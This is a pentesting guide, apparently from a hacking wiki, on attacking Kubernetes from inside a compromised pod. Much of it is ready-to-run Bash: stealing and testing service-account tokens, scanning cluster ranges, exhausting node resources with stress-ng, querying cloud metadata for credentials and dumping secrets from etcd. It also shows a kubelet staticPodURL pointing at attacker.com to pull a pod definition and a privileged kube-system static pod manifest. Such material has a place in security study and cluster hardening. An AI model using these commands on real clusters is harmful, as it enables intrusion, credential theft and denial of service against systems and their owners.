Attacking Kubernetes from inside a Pod
If you are lucky enough, you may be able to escape from the pod to the node:
In order to try to escape from the pod you might need to escalate privileges first; some techniques to do it:
You can check these Docker breakouts to try to escape from a pod you have compromised:
As explained in the section about Kubernetes enumeration:
Kubernetes Enumeration
Usually the pods are run with a service account token inside of them. This service account may have some privileges attached to it that you could abuse to move to other pods or even to escape to the nodes configured inside the cluster. Check how in:
Abusing Roles/ClusterRoles in Kubernetes
If the pod is run inside a cloud environment, you might be able to leak a token from the metadata endpoint and escalate privileges using it.
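The service account token mentioned above is normally mounted at a well-known default path inside the pod. A minimal sketch of grabbing it and checking its privileges, assuming kubectl is available in the pod (or can be copied in):

```bash
# Default mount path of the service account token and namespace inside a pod
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# List what this service account is allowed to do in its own namespace
kubectl --token="$TOKEN" \
  --server="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}" \
  --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
  -n "$NAMESPACE" auth can-i --list
```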
As you are inside the Kubernetes environment, if you cannot escalate privileges by abusing the current pod's privileges and you cannot escape from the container, you should search for potentially vulnerable services.
For this purpose, you can try to get all the services of the Kubernetes environment:
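A minimal sketch, assuming either kubectl or curl is available inside the compromised pod (paths and environment variables are the in-cluster defaults):

```bash
# With kubectl (uses the mounted service account)
kubectl get services --all-namespaces

# Without kubectl, query the API server directly with the mounted token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -sk -H "Authorization: Bearer $TOKEN" \
  "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/api/v1/services"
```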
By default, Kubernetes uses a flat networking schema, which means any pod/service within the cluster can talk to any other. The namespaces within the cluster don't have any network security restrictions by default: anything in one namespace can talk to other namespaces.
The following Bash script (taken from a Kubernetes workshop) will install a port scanner and scan the IP ranges of the Kubernetes cluster:
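The referenced workshop script is not reproduced here; the sketch below captures the same idea. The CIDR ranges and port list are assumptions and should be adapted to the target cluster (the pod's own IP and /etc/resolv.conf give good hints):

```bash
#!/bin/bash
# Install nmap inside the pod (Debian/Ubuntu based image assumed)
apt-get update && apt-get install -y nmap

# Assumed ranges: default kubeadm service CIDR and a common pod CIDR
SERVICE_CIDR="10.96.0.0/16"
POD_CIDR="10.244.0.0/16"

# Scan common Kubernetes-related ports (API server, etcd, kubelet, kube-proxy, etc.)
nmap -sT -Pn --open -p 22,53,80,443,2379,2380,6443,8080,8443,9090,10250,10255,10256 \
  "$SERVICE_CIDR" "$POD_CIDR"
```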
Check out the following page to learn how you could attack Kubernetes-specific services to compromise other pods or the whole environment:
Pentesting Kubernetes Services
In case the compromised pod is running some sensitive service where other pods need to authenticate, you might be able to obtain the credentials sent from the other pods by sniffing local communications.
By default, techniques like ARP spoofing (and, thanks to that, DNS spoofing) work in the Kubernetes network. Then, inside a pod, if you have the NET_RAW capability (which is there by default), you will be able to send custom crafted network packets and perform MitM attacks via ARP spoofing against all the pods running on the same node. Moreover, if the malicious pod is running on the same node as the DNS server, you will be able to perform a DNS spoofing attack against all the pods in the cluster.
Kubernetes Network Attacks
If there is no specification of resources in the Kubernetes manifests and no limit ranges are applied to the containers, as an attacker we can consume all the resources of the node where the pod/deployment is running, starve other pods and cause a DoS for the environment.
This can be done with a tool such as stress-ng:
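For example (the numbers are illustrative and should be tuned to the node size; assumes stress-ng can be installed or is present in the pod):

```bash
# Spawn CPU and memory workers for 2 minutes
stress-ng --cpu 4 --vm 2 --vm-bytes 2G --timeout 120s
```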
You can see the difference in resource consumption while stress-ng is running and after it finishes.
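For example, if metrics-server is deployed in the cluster (an assumption), the consumption can be compared with:

```bash
kubectl top node
kubectl top pod --all-namespaces
```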
If you manage to escape from the container, there are some interesting things you will find on the node:
The Container Runtime process (Docker)
More pods/containers running on the node that you can abuse like this one (more tokens)
The whole filesystem and OS in general
The Kube-Proxy service listening
The Kubelet service listening. Check config files:
Directory: /var/lib/kubelet/
/var/lib/kubelet/kubeconfig
/var/lib/kubelet/kubelet.conf
/var/lib/kubelet/config.yaml
/var/lib/kubelet/kubeadm-flags.env
/etc/kubernetes/kubelet-kubeconfig
Other common Kubernetes files:
$HOME/.kube/config - User Config
/etc/kubernetes/kubelet.conf - Regular Config
/etc/kubernetes/bootstrap-kubelet.conf - Bootstrap Config
/etc/kubernetes/manifests/etcd.yaml - etcd Configuration
/etc/kubernetes/pki - Kubernetes Keys
If you cannot find the kubeconfig file in one of the previously mentioned paths, check the --kubeconfig argument of the kubelet process:
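For example, the flag can be spotted in the kubelet command line:

```bash
# Look for a --kubeconfig=... argument in the kubelet command line
ps -ef | grep kubelet | tr ' ' '\n' | grep -- --kubeconfig
```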
The script can-they.sh will automatically get the tokens of other pods and check if they have the permission you are looking for (instead of you checking them one by one):
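If the script is not at hand, a manual sketch of what it automates could look like this; the token path is the default kubelet pod volume location, while the API server address and the permission being checked are placeholders to adapt:

```bash
APISERVER="https://<api-server-ip>:6443"   # placeholder

# Iterate over every service account token mounted on this node and ask the API
# server whether it can, for example, list secrets in kube-system.
for token in /var/lib/kubelet/pods/*/volumes/kubernetes.io~serviceaccount/*/token; do
  echo "== $token =="
  kubectl --token="$(cat "$token")" --server="$APISERVER" --insecure-skip-tls-verify \
    auth can-i list secrets -n kube-system
done
```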
A DaemonSet is a pod that is run on all the nodes of the cluster. Therefore, if a DaemonSet is configured with a privileged service account, on ALL the nodes you will be able to find the token of that privileged service account and abuse it.
The exploit is the same as in the previous section, but now you don't depend on luck.
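For example, DaemonSets and the service accounts they run with can be enumerated like this (assuming the current credentials can list DaemonSets):

```bash
kubectl get daemonsets --all-namespaces \
  -o custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,SERVICE_ACCOUNT:.spec.template.spec.serviceAccountName'
```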
If the cluster is managed by a cloud service, usually the node will have different access to the metadata endpoint than the pod. Therefore, try to access the metadata endpoint from the node (or from a pod with hostNetwork set to true):
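For example (AWS and GCP endpoints shown; other providers use similar mechanisms):

```bash
# AWS (IMDSv1 shown for brevity; IMDSv2 requires requesting a session token first)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
```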
Kubernetes Pivoting to Clouds
If you can specify the nodeName of the node that will run the container, get a shell inside a control-plane node and dump the etcd database:
Control-plane nodes have the role master, and in cloud-managed clusters you won't be able to run anything on them.
If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets.
Below is a quick and dirty way to grab secrets from etcd if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the etcd client utility etcdctl and uses the control-plane node's credentials to connect to etcd wherever it is running, check out this example manifest from @mauilion.
Check to see if etcd is running on the control-plane node and see where the database is (this is on a kubeadm-created cluster):
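A minimal check:

```bash
# Check for an etcd process and extract its data directory from the command line.
# On a kubeadm cluster this typically shows --data-dir=/var/lib/etcd
ps -ef | grep '[e]tcd' | tr ' ' '\n' | grep -- --data-dir
```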
Output:
View the data in the etcd database:
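Assuming the default kubeadm data directory found above:

```bash
# Dump readable strings from the etcd database file
strings /var/lib/etcd/member/snap/db | less
```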
Extract the tokens from the database and show the service account name:
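A rough sketch of the idea (service account JWTs start with eyJhbGciOi; for each one, a nearby /registry/ key names the secret it belongs to):

```bash
db=$(strings /var/lib/etcd/member/snap/db)
for token in $(echo "$db" | grep 'eyJhbGciOi'); do
  # Look a few lines back for the registry key of the secret holding this token
  name=$(echo "$db" | grep -B40 "$token" | grep '/registry/secrets/' | tail -n 1)
  echo "$name | $token"
done
```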
Same command, but with some greps to only return the default token in the kube-system namespace:
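Same sketch, filtered:

```bash
db=$(strings /var/lib/etcd/member/snap/db)
for token in $(echo "$db" | grep 'eyJhbGciOi'); do
  name=$(echo "$db" | grep -B40 "$token" | grep '/registry/secrets/' | tail -n 1)
  echo "$name | $token"
done | grep 'kube-system' | grep 'default'
```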
Output:
Create a snapshot of the etcd database. Check this script for further info.
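A sketch using etcdctl with the kubeadm default certificate paths (adjust if the cluster stores them elsewhere):

```bash
ETCDCTL_API=3 etcdctl \
  --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  snapshot save /tmp/etcd.snapshot
```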
Transfer the etcd snapshot out of the node in your favourite way.
Unpack the database:
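For example, restoring the snapshot into a local data directory (assuming etcdctl is installed locally):

```bash
ETCDCTL_API=3 etcdctl snapshot restore /tmp/etcd.snapshot --data-dir=/tmp/etcd-restore
```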
Start etcd on your local machine and make it use the stolen snapshot:
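A sketch for a local machine with etcd installed, pointing it at the restored data directory:

```bash
etcd --data-dir=/tmp/etcd-restore \
  --listen-client-urls http://127.0.0.1:2379 \
  --advertise-client-urls http://127.0.0.1:2379
```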
List all the secrets:
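For example, listing the keys under the secrets registry prefix:

```bash
ETCDCTL_API=3 etcdctl --endpoints=http://127.0.0.1:2379 \
  get /registry/secrets --prefix --keys-only
```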
Get the secrets:
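For example:

```bash
# <namespace> and <secret-name> are placeholders taken from the previous listing
ETCDCTL_API=3 etcdctl --endpoints=http://127.0.0.1:2379 \
  get /registry/secrets/<namespace>/<secret-name>
```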
Static Pods are managed directly by the kubelet daemon on a specific node, without the API server observing them. Unlike Pods that are managed by the control plane (for example, via a Deployment), the kubelet itself watches each static Pod (and restarts it if it fails).
Therefore, static Pods are always bound to one Kubelet on a specific node.
The kubelet automatically tries to create a mirror Pod on the Kubernetes API server for each static Pod. This means that the Pods running on a node are visible on the API server, but cannot be controlled from there. The Pod names will be suffixed with the node hostname with a leading hyphen.
The spec of a static Pod cannot refer to other API objects (e.g., ServiceAccount, ConfigMap, Secret, etc.), so you cannot abuse this behaviour to launch a pod with an arbitrary serviceAccount on the current node to compromise the cluster. But you could use this to run pods in different namespaces (in case that's useful for some reason).
If you are inside the node host, you can make the kubelet create a static pod on it. This is pretty useful because it might allow you to create a pod in a different namespace, such as kube-system.
In order to create a static pod, the docs are a great help. You basically need 2 things (sketched below):
Configure the param --pod-manifest-path=/etc/kubernetes/manifests in the kubelet service, or in the kubelet config (staticPodPath), and restart the service.
Create the pod definition in /etc/kubernetes/manifests.
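A minimal sketch of checking the static pod path in the kubelet config and restarting the service (the kubeadm default config path is assumed):

```bash
# The kubelet config on kubeadm nodes usually lives here
grep -i staticPodPath /var/lib/kubelet/config.yaml
# Typically returns: staticPodPath: /etc/kubernetes/manifests

# After any change to the config, restart the kubelet
systemctl restart kubelet
```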
Another, stealthier way would be to:
Modify the param staticPodURL in the kubelet config file and set something like staticPodURL: http://attacker.com:8765/pod.yaml. This will make the kubelet process create a static pod, getting the configuration from the indicated URL.
Example of pod configuration to create a privileged pod in kube-system, taken from here:
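The linked example is not reproduced here; a minimal illustrative manifest (name and image are placeholders) that yields a privileged pod in kube-system with the node's root filesystem mounted could look like this:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: priv-static-pod        # hypothetical name
  namespace: kube-system
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: priv
    image: ubuntu:latest       # any image with a shell works
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
```

Dropping such a file into /etc/kubernetes/manifests/ on the node should make the kubelet create the pod automatically.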
If an attacker has compromised a node and can delete pods from other nodes and prevent other nodes from executing pods, the pods will be re-run on the compromised node and the attacker will be able to steal the tokens running in them. For more info follow these links.